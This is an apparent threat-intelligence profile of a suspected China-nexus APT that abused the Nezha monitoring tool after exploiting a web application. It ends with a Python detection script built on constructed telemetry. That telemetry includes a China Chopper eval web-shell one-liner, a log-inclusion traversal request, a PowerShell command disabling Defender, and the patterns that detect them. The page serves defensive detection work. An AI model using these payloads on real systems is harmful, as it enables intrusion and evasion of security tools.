Mallory

china_nexus_apt_group


A suspected China-nexus APT group that reporting describes as underreported but capable. The group was observed abusing Nezha, a legitimate open-source server monitoring and task management tool, to collect detailed host information from compromised systems, run commands, and maintain control of victim machines.

In the reported campaign, initial access came through exploitation of a vulnerable public-facing web application, followed by log poisoning to plant a China Chopper web shell and use of AntSword as a virtual terminal to control the compromised web server. The actors then installed Nezha and used it for follow-on activity, including running PowerShell commands to disable Windows Defender and deploying Ghost RAT.

Huntress identified more than 100 victim machines with the Nezha client installed, primarily in Taiwan, Japan, South Korea, and Hong Kong. The activity was assessed as likely politically motivated, although Huntress did not formally attribute the campaign to a specific threat actor or determine whether the end goal was espionage or data theft. The China-nexus assessment rests on the use of simplified Chinese in the administrative interface and on overlap between the Ghost RAT sample used and malware previously linked to China-nexus APT groups targeting the Tibetan community. Additional reporting noted a YARA detection for a backdoor loader used by a China-nexus APT group, keyed on two distinct PDB path strings.

Known associated tooling and malware mentioned in the reporting: Nezha, China Chopper, AntSword, Ghost RAT, and an unspecified backdoor loader.
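The chain above leaves ordinary telemetry behind even though the final tool is legitimate software: a web access log that records both the poisoning request and the traversal used to include the log, PowerShell script-block text that turns off Defender, and a web-server worker that spawns a shell before the agent appears. The following detection-triage script is an added example written for this page; it is not code from Huntress, Mallory, or the Nezha project. All log lines, script blocks, and process events are constructed; the China Chopper one-liner uses the family's well-known `eval($_POST[...])` shape; and the `nezha-agent.exe` image name with `-s`/`-p` arguments is an assumption about how the agent could appear in process telemetry, not an observed indicator.

```python
"""Triage constructed telemetry for the tradecraft described above: log poisoning to
plant a web shell, Defender tampering via PowerShell, and a monitoring agent launched
from a web-server process chain. Added example; all sample data is constructed."""
import re

# --- Constructed sample telemetry (not taken from any vendor report) ----------------
ACCESS_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # log poisoning: a China Chopper style one-liner sent as the User-Agent so it is written to the log
    "203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] \"GET /index.php HTTP/1.1\" 200 512 \"-\" \"<?php @eval($_POST['pass']);?>\"",
    # follow-up: path traversal to pull the poisoned log through a vulnerable include
    '203.0.113.7 - - [01/Jan/2025:10:00:03 +0000] "GET /view.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2025:10:05:00 +0000] "GET /about.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
SCRIPT_BLOCKS = [  # PowerShell script-block text, e.g. the payload of Event ID 4104
    "Get-ChildItem C:\\inetpub\\wwwroot",
    "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\\ProgramData\\svc",
]
PROCESS_EVENTS = [  # process-creation events; the nezha-agent image name and flags are assumed
    {"parent": "w3wp.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": "cmd.exe", "image": "nezha-agent.exe", "cmdline": "nezha-agent.exe -s 192.0.2.10:5555 -p secret"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe"},
]

# --- Detection logic ------------------------------------------------------------------
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=)", re.I)                      # PHP code in a logged field
LOG_INCLUDE = re.compile(r"(\.\./|%2e%2e%2f|/var/log/|/proc/self/environ)", re.I)
DEFENDER_TAMPER = re.compile(
    r"\b(Set|Add)-MpPreference\b[^;\n]*-(DisableRealtimeMonitoring|DisableBehaviorMonitoring|"
    r"DisableIOAVProtection|ExclusionPath|ExclusionProcess|ExclusionExtension)\b", re.I)
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd", "httpd.exe", "apache2", "nginx", "php-fpm", "php-cgi.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash"}


def find_log_poisoning(lines):
    """Return (line_number, reason) for entries where PHP code was written into a logged
    field (the poisoning step) or a log file is pulled in via path traversal (the include step)."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = COMBINED_LOG.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these separately
        if any(PHP_TAG.search(m.group(f)) for f in ("req", "ref", "ua")):
            hits.append((n, "php_in_request_field"))
        elif LOG_INCLUDE.search(m.group("req")):
            hits.append((n, "log_file_inclusion"))
    return hits


def find_defender_tampering(blocks):
    """Return (block_number, [switches]) for script blocks that weaken Defender through
    Set-MpPreference / Add-MpPreference, listing every tampering switch seen in the block."""
    hits = []
    for n, text in enumerate(blocks, 1):
        switches = [m.group(2) for m in DEFENDER_TAMPER.finditer(text)]
        if switches:
            hits.append((n, switches))
    return hits


def find_suspicious_processes(events):
    """Flag a web-server worker spawning an interactive shell (web shell behaviour) and any
    execution of the Nezha agent, whichever parent launched it."""
    hits = []
    for n, ev in enumerate(events, 1):
        parent, image = ev["parent"].lower(), ev["image"].lower()
        if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
            hits.append((n, "web_server_spawned_shell"))
        if "nezha-agent" in image or "nezha-agent" in ev["cmdline"].lower():
            hits.append((n, "nezha_agent_execution"))
    return hits


def triage(access_log=ACCESS_LOG, script_blocks=SCRIPT_BLOCKS, process_events=PROCESS_EVENTS):
    """Run all three detectors and return their findings keyed by category."""
    return {
        "log_poisoning": find_log_poisoning(access_log),
        "defender_tampering": find_defender_tampering(script_blocks),
        "suspicious_processes": find_suspicious_processes(process_events),
    }


if __name__ == "__main__":
    for category, hits in triage().items():
        print(f"{category}: {hits}")
```

The three detectors are deliberately independent so that each can be mapped to its own log source (web access logs, PowerShell script-block logging, and EDR or Sysmon process creation). In practice the highest-confidence signal is the sequence: a PHP tag in a logged field, a traversal request for that log file shortly after, and then a shell or agent spawned under the web-server worker; correlating them on source IP and host narrows alerts to the web-shell-to-Nezha chain rather than to any single noisy pattern.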
